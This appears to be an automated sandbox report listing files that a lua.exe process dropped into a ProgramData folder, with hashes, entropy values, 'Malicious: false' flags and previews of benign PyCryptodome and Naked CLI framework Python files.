SHA-512:	12F42616F440853BF94758392116879BE87073F515AE0C33454BFAC2D80140DE0FCC0469E34D8E06B42436A3EDEF4B5BE8D0E7C5EFCE413CE0F89041556CCA59
Malicious:	false
Preview:	from typing import List, Optional, Callable......def ceil_div(n: int, d: int) -> int: .....def size (N: int) -> int: .....def getRandomInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomRange(a: int, b: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomNBitInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def GCD(x: int,y: int) -> int: .....def inverse(u: int, v: int) -> int: .....def getPrime(N: int, randfunc: Optional[Callable]=None) -> int: .....def getStrongPrime(N: int, e: Optional[int]=0, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> int: .....def isPrime(N: int, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> bool: .....def long_to_bytes(n: int, blocksize: Optional[int]=0) -> bytes: .....def bytes_to_long(s: bytes) -> int: .....def long2str(n: int, blocksize: Optional[int]=0) -> bytes: .....def str2long(s: bytes) -> int: .......sieve_base: List[int]..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\py3compat.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5309
Entropy (8bit):	4.9008763846376775
Encrypted:	false
SSDEEP:	96:WKYFQHvoA6pDLeAIeCGtFaVBS3eKQM4ks58WSHor34LPwAEx2pdDoUSpvJnaUua:W9QHvilIUwpK5l9Hoz4pdCvntua
MD5:	44D70AB2F0806DA4F96ACC589DEA3D9B
SHA1:	AC2D1B3D74E2D38C18B3881382A7C1920B137DF2
SHA-256:	FB3B8D3FBFD0C956653D43EF834CAD7DB60ABC7D0F52F49233B9EA6414E01170
SHA-512:	C2136F91EEF54663159EE420908FA6C90471165B0DCC058AE8B6A492C4FFB1C73D708226A9BB81DAECDFC464A2BEDA753D41933990040701374CD6FB0B01B5DF
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# Util/py3compat.py : Compatibility code for handling Py3k / Python 2.x..#..# Written in 2010 by Thorsten Behrens..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWA

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\py3compat.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	797
Entropy (8bit):	4.776758428407196
Encrypted:	false
SSDEEP:	24:1REgT3JtgPnrnIW9h3MnBbRFNU+Fuf4iEe1oHhASLjPMQ:pZtgMcUzUTtoBjLt
MD5:	42AE70646CD8F3CEF936DDAB0140DEA0
SHA1:	9F4A01B23A4ACFCF73336608DFDFE7F882905F39
SHA-256:	96B25FC9DE7190FB7C46C8871E436C36150F329B744B1E50B31794666ACD07B6
SHA-512:	A28650713F18CB4C09CE46552D8294544E93D9C3602EACE2E2006E2787FD101D7AEA8D2769DE2AFC0859F8F1C3BA19217B7B6D8481B6B31FBFC390C7105D337D
Malicious:	false
Preview:	from typing import Union, Any, Optional, IO....Buffer = Union[bytes, bytearray, memoryview]....import sys....def b(s: str) -> bytes: .....def bchr(s: int) -> bytes: .....def bord(s: bytes) -> int: .....def tobytes(s: Union[bytes, str]) -> bytes: .....def tostr(b: bytes) -> str: .....def bytestring(x: Any) -> bool: .......def is_native_int(s: Any) -> bool: .....def is_string(x: Any) -> bool: .......def BytesIO(b: bytes) -> IO[bytes]: .......if sys.version_info[0] == 2:.. from sys import maxint.. iter_range = xrange....else:.. from sys import maxsize as maxint.. iter_range = range....class FileNotFoundError:.. def __init__(self, err: int, msg: str, filename: str) -> None:.. pass....def _copy_bytes(start: Optional[int], end: Optional[int], seq: Buffer) -> bytes: .....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\strxor.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5255
Entropy (8bit):	4.7740917957604205
Encrypted:	false
SSDEEP:	96:MwDqrYJALrYJHdt3EHGuIWYIOuPwEjduqvdcXZCB94mNhv+Q:9qrskrs9t3q/IKPxwq+Juhr
MD5:	39C4258689F0D31AE5C48A954D0F69A2
SHA1:	92C8AE549947E3216C3EC969FEFCAC3184DDBB63
SHA-256:	7D71B663D870B1194E97BBCB6CF8B72DB50043C4B66CC14679DE627B1418D936
SHA-512:	F52E2B57BCDC5ADD00CB5EAD26479A108FD07B263E6BD26A7F274BA4FB133106DC1CCD9607EC4B63FC78D087EFDFCB0A22A0433276ACC25AD9D232FE8A17CF83
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\strxor.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	249
Entropy (8bit):	4.800678842548869
Encrypted:	false
SSDEEP:	6:1REYBXyUzrIY3MTDyQdQAY0OXW6ah05gUQdByKj0ah05gv:1REYB3vIY3YyQnrOXAh05VQ6KZh05q
MD5:	81C7899ED070F1D26338977374A4B853
SHA1:	2627B47DA19BB2F2B8E7D25A5A57473C00C86550
SHA-256:	CA7D073C74998CFFB501A2E6E1C99AF62F49272A5FDFB3527769E2A632DFE1A0
SHA-512:	CF5299A774C61A0F84D6E1E4233F426CC9D854D809EEF0D6B1158EC0078E75C54C3141E835DC3D0F376B53EFB8DDE462B49B0A5093C63613B332617966F34D0C
Malicious:	false
Preview:	from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....def strxor(term1: bytes, term2: bytes, output: Optional[Buffer]=...) -> bytes: .....def strxor_c(term: bytes, c: int, output: Optional[Buffer]=...) -> bytes: .....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	189
Entropy (8bit):	4.801445307693507
Encrypted:	false
SSDEEP:	3:UFo+CmMRJ4ZdK0CJOAlFGCJ7DkCAZFBVC5uQLCY3qUX7vRqvljhfxXFqYLULEov:UvZdK0pAlV/kCAZ4sdyr8ljZRFqI5ov
MD5:	29C14110E4F581AC6E37AE7C9C49AC3C
SHA1:	812A19016C87AED19C31992CD55A7FA777C16625
SHA-256:	CB66D54A589E28C08226A3155AAD14972C122B8099A27A31B11B277B69E7F222
SHA-512:	1BCC03A5B459D1D7A0688B7275361D3E9BD6ECC0837C1A6EEEAC6FAFF67C05258612CD44781F85963309CD53DB3CADB4C3055C44EB678DBED5ACB7E8FE8614A7
Malicious:	false
Preview:	__all__ = ['Cipher', 'Hash', 'Protocol', 'PublicKey', 'Util', 'Signature',.. 'IO', 'Math']....version_info = (3, 10, 1)....__version__ = ".".join([str(x) for x in version_info])..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\__init__.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	103
Entropy (8bit):	4.320003818965119
Encrypted:	false
SSDEEP:	3:1REvgBk8J0fWQLCfcJAOLRL+2MliHovcoFQy:1REYBb0fWpcFY2MtJN
MD5:	BF77DB2C18C7E4E3E80EA7D09C2D8336
SHA1:	682ADC1869A615EBC5152E303D7F10C9DF4800C1
SHA-256:	748D33339311187C619DF8EAA40C8F1A8B4A4EB3E59DE4CDD90FA30105CD8351
SHA-512:	ADD512240AB6D99FF0B4871C7F96849267CCB8CD5BE8BAB86579D5599434266F1C4C290DF395526C694110BDD67DCDA6970CEF39416AB87798AC78914AD87EB7
Malicious:	false
Preview:	from typing import Tuple, Union....version_info : Tuple[int, int, Union[int, str]]..__version__ : str..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked-0.1.31.dist-info\DESCRIPTION.rst Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1450
Entropy (8bit):	4.782658817733709
Encrypted:	false
SSDEEP:	24:KUjHIlBVB+0uljRGRYkgJ+R7r8jY+R9jY+Rf6e03fh48jBj+aImughp2TR811wn1:5I00uKSu7r9uauf6e8fmeugSTgxWhI+v
MD5:	4805DE472D713215065C50493C83D7BA
SHA1:	7EE2FB1EED55AA11DBD3366CA6FAEF85E277C9FC
SHA-256:	DBA4B943003355D2D1BEF826F59B057B656C1767FAC726C692540432DD13D39B
SHA-512:	67841600CD5E2DB5BFCFFC645F2D94A1C0CB2813F923B3FF188281FE4DF5EA82E5E1946D40A235EF78BF1E9AEA965B5C806886D3B0C6FE312364587921EAB30A
Malicious:	false
Preview:	About.------..`Naked <http://naked-py.com>`_ is a new Python command line application framework that is in development. The current release is a stable, testing release...Updates.--------..Changes, updates, and brief tutorials are available on the `developer log <http://nakedpy.wordpress.com/>`_...QuickStart Guide.------------------..The quickstart guide is available at `http://docs.naked-py.com/quickstart.html <http://docs.naked-py.com/quickstart.html>`_. It demonstrates how the available tools can be incorporated into your development workflow, spanning the entire period from an empty project directory to your first PyPI version release...Documentation.--------------..Documentation is in development at `http://docs.naked-py.com/ <http://docs.naked-py.com/>`_..Issue Reporting.----------------..Issue reporting is available on the `GitHub repository <http://github.com/chrissimpkins/naked/issues>`_..Contribute.-----------..I would greatly appreciate feedback from anyone who is testing t

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked-0.1.31.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked-0.1.31.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2341
Entropy (8bit):	4.937070056970247
Encrypted:	false
SSDEEP:	48:Dba9cCQILjwiaa213SfI00uKSu7r9uauf6e8fmeugSTgxWhI+pgsb:DbaFQILjjaa213SfIMC+9gwgxWV
MD5:	349C373F487AE4CCDC2B736940C4F8A3
SHA1:	311CFDAA77FAAC58ABD48C4BEC473A0063325F6F
SHA-256:	CFB216025302DDE22535CF11956C49D5F7AE0E176542DCE204E5D7CDC64AF9CF
SHA-512:	AB6EF18B90DC93B9299D20FE86A3490C5A220970984BE51D0BDDE9454DFFAB6FE099D16C679D6CB3CA31B1AB0E4469ED47310278A36E22CB8B614CB63C365A1A
Malicious:	false
Preview:	Metadata-Version: 2.0.Name: Naked.Version: 0.1.31.Summary: A command line application framework.Home-page: http://naked-py.com.Author: Christopher Simpkins.Author-email: chris@zerolabs.net.License: MIT.Keywords: python,command line,system,application,framework,CLI.Platform: any.Classifier: Intended Audience :: Developers.Classifier: Natural Language :: English.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 2.6.Classifier: Programming Language :: Python :: 2.7.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.3.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Requires-Dist: Naked.Requires-Dist: requests.Requires-Dist: pyyaml..About.------..`Naked <http://naked-py.com>`_ is a new Python command line application framework that is in de

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked-0.1.31.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8506
Entropy (8bit):	5.757592734945533
Encrypted:	false
SSDEEP:	96:shCXL7JMbQJQx87gKWjvVTjwBwOPfA3CtkOJ6JpoBAKkMuaKoaGuza1KJYRvnw0D:sUX/Ii5MElhlrqqb6G8QDfV9lWqx
MD5:	EE6F98D07B1603AF557CE9E2A006BDE5
SHA1:	7E033FC54B005B2B13DA9F5381802B94167AE5EF
SHA-256:	DEE6579D71E815188F9724C085DB7C1BC0245D5C444D53CA878C317C8C20437D
SHA-512:	1F3AB92556FE5EC56A67F2F6A778BE1818EE1CBD17D712EECC8D4EE21D57A73F4362A81C281A8670BFFB67DEB5DE45C029414651548680CB4976B7D7BEA5B196
Malicious:	false
Preview:	../../Scripts/naked.exe,sha256=VDRGF5lRU8Gw54MG10OPfmFh79uKBjRynrHwzFqGtPk,97117..Naked-0.1.31.data/scripts/naked,sha256=Ps1mufxMkBG7wwaJHQ_nkMwOrPP1hTZLDH7YMNO4Y2E,285..Naked-0.1.31.dist-info/DESCRIPTION.rst,sha256=26S5QwAzVdLRvvgm9ZsFe2VsF2f6xybGklQEMt0T05s,1450..Naked-0.1.31.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..Naked-0.1.31.dist-info/METADATA,sha256=z7IWAlMC3eIlNc8RlWxJ1feuDhdlQtziBOXXzcZK-c8,2341..Naked-0.1.31.dist-info/RECORD,,..Naked-0.1.31.dist-info/WHEEL,sha256=SXYYsi-y-rEGIva8sB8iKF6bAFD6YDhmqHX5hI3fc0o,110..Naked-0.1.31.dist-info/entry_points.txt,sha256=-7nL8pc5fnKhIUINYqLDa1jd3y-8jynn9u5qF9EyjqU,42..Naked-0.1.31.dist-info/pydist.json,sha256=cSetsKYPMVxYIilVGZD_wtke5QtnHkWmKGTF5uDSV10,1119..Naked-0.1.31.dist-info/top_level.txt,sha256=CG1yk0vViILO5nUzrfUqtOs-0IAsZBY1zLFGi3O-SCc,6..Naked/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..Naked/__pycache__/__init__.cpython-37.pyc,,..Naked/__pycache__/app.cpython-37.pyc,,..Naked

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked-0.1.31.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.785061497991155
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVjxHgP+tPCCf7irO5S:RtBMwlVGWBBwt
MD5:	A4A3A622FAA824BBD758CCB989476EEE
SHA1:	7615CC94B973330EEE22866067A10795F145E49F
SHA-256:	497618B22FB2FAB10622F6BCB01F22285E9B0050FA603866A875F9848DDF734A
SHA-512:	DC743B0D0C89E1693BC8B244812E440ED89EB600FAB26164E5BD351C91EF14B0DBA1119AB911EB99096D8E4C5171C126B68D3E56FE224F94B5CE7627DF6E8B68
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.22.0).Root-Is-Purelib: true.Tag: py2-none-any.Tag: py3-none-any..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked-0.1.31.dist-info\entry_points.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.350068910616443
Encrypted:	false
SSDEEP:	3:1LEZvTlLn:1Lgh
MD5:	32D1BFD76B5E9AD48FC021E5A2D4A6F8
SHA1:	644398ACB547E93FA3DA70690E45E77935E8CDB6
SHA-256:	FBB9CBF297397E72A121420D62A2C36B58DDDF2FBC8F29E7F6EE6A17D1328EA5
SHA-512:	4A2135AE0C7942FF5782CB82F0DB6DF1A8FAD36EC9188EA82C2600EEA016A8F758671955D695E35B36460E7566AE38ECDEC893323EDB02EFDA49F4205E84E120
Malicious:	false
Preview:	[console_scripts].naked = Naked.app:main..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked-0.1.31.dist-info\pydist.json Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	4.900619869046922
Encrypted:	false
SSDEEP:	24:Y+QDTtJ+J1xa7jWlXlBJj4J1CvtQgDs3IKLtqLZftULZft0LZftbLZft7LZftMAH:Y+QDf+7xaPWnag7oInooffh13Ii
MD5:	460789FC46CEAE6085BEA8DD87AE2393
SHA1:	3E02AA378AE1E7EB6C61FBB86ABA212097FDB4B9
SHA-256:	7127ADB0A60F315C582229551990FFC2D91EE50B671E45A62864C5E6E0D2575D
SHA-512:	3E99D050D10CF434DA2AEA4FE7E8FDAF9BD1BC9C5C3E5469A2A40F6969E51D340019A8CEDC96897FED3D573822561FBC76D018E8471DC7C69A8F54FB2C528AB1
Malicious:	false
Preview:	{"license": "MIT", "exports": {"console_scripts": {"naked": "Naked.app:main"}}, "document_names": {"description": "DESCRIPTION.rst"}, "name": "Naked", "metadata_version": "2.0", "contacts": [{"role": "author", "email": "chris@zerolabs.net", "name": "Christopher Simpkins"}], "generator": "bdist_wheel (0.22.0)", "commands": {"wrap_console": {"naked": "Naked.app:main"}}, "summary": "A command line application framework", "project_urls": {"Home": "http://naked-py.com"}, "platform": "any", "run_requires": [{"requires": ["Naked", "requests", "pyyaml"]}], "version": "0.1.31", "keywords": "python,command line,system,application,framework,CLI", "classifiers": ["Intended Audience :: Developers", "Natural Language :: English", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", "Programming Language :: Python", "Programming Language :: Python :: 2", "Programming Language :: Python :: 2.6", "Programming Language :: Python :: 2.7", "Programming Language :: Python :: 3",

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked-0.1.31.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6
Entropy (8bit):	2.584962500721156
Encrypted:	false
SSDEEP:	3:S:S
MD5:	08F6E30758BDAAE5F538C2881752E29B
SHA1:	7B70829F46B321D127577E3CFE1A5B29BA9345C2
SHA-256:	086D72934BD58882CEE67533ADF52AB4EB3ED0802C641635CCB1468B73BE4827
SHA-512:	9B0FA39AF650A7A12FC9B4F1D8E07D23DB630EF2331A1B677D1C431B30739A0A8FD2DEC2A4ABAF9956AAF7E2F55ED218C94AA2498F8DF6BE7464DB7FB323D37D
Malicious:	false
Preview:	Naked.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\app.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11880
Entropy (8bit):	4.122442726841868
Encrypted:	false
SSDEEP:	192:RI77+UJ1nnVfmqljg2LhnPsrhxOic/XdK6RcGTM:RY7+Y1nnVf1DBux8XdKn
MD5:	827A3913890D00A00689FC221DE22246
SHA1:	ED74386A218C562CA9091B8A6AAEBEBEF01A2912
SHA-256:	89F798C667156F76A8973A99373790185EAB9D3B896ADC8CDECC217FAF06E5C7
SHA-512:	FCE9F85EDCE3D17DE318F9750BC6D8D75B62A650B59894459F98F3F182ACC30ABC2465A1A03502BEF6C74CA7AB905FE3C06E7661D3001385E7463BA132E07BC2
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..#------------------------------------------------------------------------------.# Naked \| A Python command line application framework.# Copyright 2014 Christopher Simpkins.# MIT License.#------------------------------------------------------------------------------..#------------------------------------------------------------------------------------.# c.cmd = Primary command (<executable> <primary command>).# c.cmd2 = Secondary command (<executable> <primary command> <secondary command>).#.# c.option(option_string, [bool argument_required]) = test for option with optional test for positional arg to the option.# c.option_with_arg(option_string) = test for option and mandatory positional argument to option test.# c.flag(flag_string) = test for presence of a "--option=argument" style flag.#.# c.arg(arg_string) = returns the next positional argument to the arg_string argument.# c.flag_arg(flag_string) = returns the flag assignment for a "--option=a

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\commandline.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	18918
Entropy (8bit):	4.2262699228499425
Encrypted:	false
SSDEEP:	192:DKZPtqJjhdnFci3BASNOCqUWxG3qElORoPPPJ2F:DKZ8hnjPPPJ2F
MD5:	B7FCE2C2DCC70A30443627B81EAE989E
SHA1:	C6AA9E3F42B6C64065561E9DD7B86FF40B8D9E61
SHA-256:	389FA4B5541665E28C4DB0B5AF8E3A3349B505989DC0140C0398695EB4CC2B95
SHA-512:	AED7357893D89054FF7BDA6F8A7EE748F9EEC25692A0F190C415AA1B479F87E937ABD2327AF908E69D36BA3B353B13C3473F0D7D4DCA0BD76DA07906DD0F5EDE
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..import sys.from Naked.settings import debug as DEBUG_FLAG.#####################################################################.# [ Command class ].# Command line command string object.# argv = list of command line arguments and options.# argc = count of command line arguments and options.# arg0 = first positional argument to command.# arg1 = second positional argument to command.# arglp = last positional argument to command.# cmd = primary command for command suite application (=arg0).# cmd2 = secondary command for command suite application (=arg1).# snippet for py block comment = #py + TAB.#####################################################################.class Command:. def __init__(self, app_path, argv):. self.argobj = Argument(argv) # create an Argument obj. self.optobj = Option(argv) # create an Option obj. self.app = app_path # path to application executable file. self.argv = argv

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\commands\args.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4681
Entropy (8bit):	4.484630605911597
Encrypted:	false
SSDEEP:	96:8jizaHYcU6CO+lr7SomcKn7Fb7nBOfBUSSqwnPqJbFcO2w:qiOHhU6CO+lPtmcK17nByBUhqwny/yw
MD5:	9957D347A71D4B48D14C7047B6605F06
SHA1:	38F29673AB53FFB03941B0E7D85D7622DFCE0132
SHA-256:	0E15BB245D85354D27B373F446B70A33F68DF0F9F9D737E02E96BB79D4BB4281
SHA-512:	4357F610F2C352D9D894B215F1C73BF3A72D8CD796BB231E1F030921C922EE7A6BE6CF23B82EDD0B4BD759C9DBCE89D15AD2C43E7C6A42A8787EEDC8BB3615F9
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..from Naked.commandline import Command.from Naked.toolshed.system import exit_success.import shlex..class Args:. def __init__(self, command_string):. self.com_string = command_string.. def run(self):. cmd_list = shlex.split(self.com_string). c = Command(cmd_list[0], cmd_list[1:]). print(' '). print(".naked. Assuming that your Command object is instantiated as an instance named 'c', the command that you entered would be parsed as follows:"). print(' '). print('Application'). print('-----------'). print('c.app = ' + c.app). print(' '). print('Argument List Length'). print('--------------------'). print('c.argc = ' + str(c.argc)). print(' '). print('Argument List Items'). print('-------------------'). print('c.argobj = ' + str(c.argobj)). print(' '). print('Arguments by Zero Indexed Start Position'). p

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\commands\build.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1040
Entropy (8bit):	4.741724467723531
Encrypted:	false
SSDEEP:	12:Hccttc87E8i9nhtwIVQING5qwN9nQMx43KhbkUUdwlsQ2LjxB2aG:8cs8Di5AIVPNwBpmSbkUAwl2xIaG
MD5:	8110006AE22638D02181D2B07E5F7B1D
SHA1:	D1B20A8DC925297FA89AE80CBF2C4E1818EFC44D
SHA-256:	483B3977AB38682C93EB3296A49E028189EEF152B1F75D022917BE13D985852F
SHA-512:	B779D1499B24D2922A4B869FB44387A49FC0B35C96D5DCA55775A3ADC921CA55AEC333D4A2409C8B8756E6DB04FF560D805CEA0458A93DFDFAA9B1B0BBA7F730
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..from Naked.toolshed.system import exit_success.#------------------------------------------------------------------------------.# [ compile_c_code function ] (--none--).# compile C files in the lib/Naked/toolshed/c directory.#------------------------------------------------------------------------------.def compile_c_code(abs_dirpath):. from Naked.toolshed.shell import execute. from os import chdir.. chdir(abs_dirpath). print('.naked. Compiling the C source library files...'). success = execute("python setup.py build_ext --inplace"). if success:. print(' '). print('.naked. C source code compile complete.'). exit_success()..def help():. help_string = """.Naked build Command Help.========================.The build command compiles the Naked C libraries. This requires an installed C compiler...USAGE. naked build..SECONDARY COMMANDS. none..OPTIONS. none""". print(help_string). exit_success(

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\commands\classifier.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1875
Entropy (8bit):	4.585849878566276
Encrypted:	false
SSDEEP:	48:8HYTIzd0HJ/u9u4Hyj/cdq9Maeayo4MPM8yVyFaG:8HYIzdaJ/ujhdXaJyo4MPfyVyFX
MD5:	1D544634984FDA5D0C6CF828A4AAB91D
SHA1:	6769A171F08EBBE4D9C4FEB08F5DEF7CE67369F4
SHA-256:	358E1E38A0E1DF189225B25FBF137C0FE62A8C9AEA73CA90F5ED37BE53C07FE0
SHA-512:	690C9E1C3485FB39F94525ED9561528CA4CC6A60E069E4E4CFD99220FA951A0F37E27BD0303E1692A341D6BD81E71F0BF394B35C5666E67FCEA96AE4B03248F6
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..from Naked.toolshed.system import exit_success..class Classifier:. def __init__(self, search_string):. self.needle = search_string. self.url = 'https://pypi.python.org/pypi?%3Aaction=list_classifiers'.. def run(self):. from Naked.toolshed.network import HTTP. http = HTTP(self.url) # use the python.org url for the classifier list.. print('.naked. Pulling the classifier list from python.org...').. res = http.get() # get the list. test_list = res.split('\n') # split on newlines.. if self.needle == "": # user did not enter a search string, print the entire list. print(".naked. You did not provide a search string. Here is the entire list:"). print(' '). for item in test_list:. print(item). else: # user entered a search string, find it. lower_needle = self.needle.lower(). print(".naked. Performing a ca

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\commands\dist.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3287
Entropy (8bit):	4.5087841579117836
Encrypted:	false
SSDEEP:	96:8ZV3SwM+d3EP31YRJpG7IcuYBleCzBnI2OMfk5P3aXm3k3/a44X:xwM+ZEP1kIHeC45PaXm3oCpX
MD5:	84B5C9DFF465C7203E03C00426B1199B
SHA1:	7CE34C1080B129DD4CFF5028AED017AE71DE56A4
SHA-256:	A861B597D6754FCF365AF46304A22CF9441649B37D79F69990AFAA4984D3555E
SHA-512:	8FB4404192903C8D54B077FFB0B50A355BE12FB192682EC3A26F475235BBD11169E9BAD77DCF5A34996A2CB8927D7F68712AD46E03AEA1325A707469CBA611D8
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..import os.from Naked.toolshed.system import file_exists, stderr, exit_success.from Naked.toolshed.shell import run as shell_run..class Dist:. def __init__(self):. self.register = "python setup.py register". self.sdist = "python setup.py sdist upload". self.wheel = "python setup.py bdist_wheel upload". self.swheel = "python setup.py sdist bdist_wheel upload". self.win = "python setup.py bdist_wininst upload". self.all = "python setup.py sdist bdist_wheel bdist_wininst upload".. #------------------------------------------------------------------------------. # [ run method ] - iterates through up to 6 directories above current working. # directory and then runs command if setup.py found. #------------------------------------------------------------------------------. def run(self, command):. setuppy_found = False. for i in range(6): # navigate up at most 4 d

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\commands\help.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	300
Entropy (8bit):	4.564886576078938
Encrypted:	false
SSDEEP:	6:HWaHUclqRLYzTRArleyAvB7dCk1AKF3XQYcMvLiwFqrx5ch3sAjajK:HcchzTytwX1A8cd55B2aG
MD5:	2DF8FBDAC0103CF36758226CCC819B4B
SHA1:	4801ED89BF203873D5830D01E218254A3D00DCB3
SHA-256:	710CEB5B60316F85FFCD1E0912598269651C135C64D927FD56934EDF51408A60
SHA-512:	39F2F81A05458F9F07A0A5DE81B8C2C388409A6F6CEFAF21A2AD3CADACB9758DED847BDD986FF96347C423A79AB4E4A8643D9D6C44ABCE6BBA2A974B2329E3B4
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..import Naked.settings.from Naked.toolshed.system import exit_success..class Help:. def __init__(self):. self.help = Naked.settings.help.. def print_help(self):. print(self.help). exit_success()...if __name__ == '__main__':. pass.

